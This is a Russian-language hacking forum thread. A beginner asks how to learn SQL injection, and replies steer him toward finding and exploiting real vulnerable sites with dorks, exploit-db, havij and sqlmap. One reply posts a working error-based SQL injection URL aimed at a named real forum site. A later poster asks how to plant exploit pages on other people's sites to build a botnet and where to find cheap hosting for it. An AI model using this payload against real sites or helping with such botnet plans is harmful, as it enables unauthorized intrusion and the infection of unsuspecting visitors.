Всем привет, обращаюсь к кому не лень. Вот решил обучиться веб хаку и решил естественно с обучения sql inj перечитал пару мануалов понял примерно че как. Но не 1 сайт уязвимый так и не нашел или я просто глупый. Вот у меня два вопроса. 1. Есть ли какой движок специально напичканный багами для того чтобы на нем изучать? 2. Есть ли тут люди которые готовы уделить свое время чтобы стать моим учителем хотя-бы на начальном уровне. Через ICQ или skype ну или jabber Знаю звучит глупо но всетаки. Спасибо за внимание. Благодарен за ответы.
Читай про гугл дорки. На том же exploit-db.com можно глянуть. Ну и мониторь сам exploit-db. Например: Смотрим Fobuc Guestbook 0.9 - SQL Injection Vulnerability. Если знаком с php или хотя бы знаешь английский, то можно разобрать что уязвим get параметр "category". Ищиш уязвимые сайты и дальше раскручиваешь havij'ом или sqlmap
http://www.xaker.name/forvb/showpost.php?p=179689&postcount=34 [noparse]http://sea-wave.ru/forum/ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))[/noparse] крути))
а forum.hobbi.tv есть уязвимости и вообще,какие они бывают? с php не знаком,английский немного знаю.раз на то пошло задам все вопросы тут,можно ли "подменить" пару страниц на чужом сайте на страницы с эксплоитами? чтоб пополнялся ботнет? это нужен доступ к хостингу? какой есть недорогой хостинг(доллар-4) чтоб подходил для ботнета? цели- форумы с не очень большой популярностью. и как быстро закроют ботнет на бесплатном хостинге? Спасибо за ответы!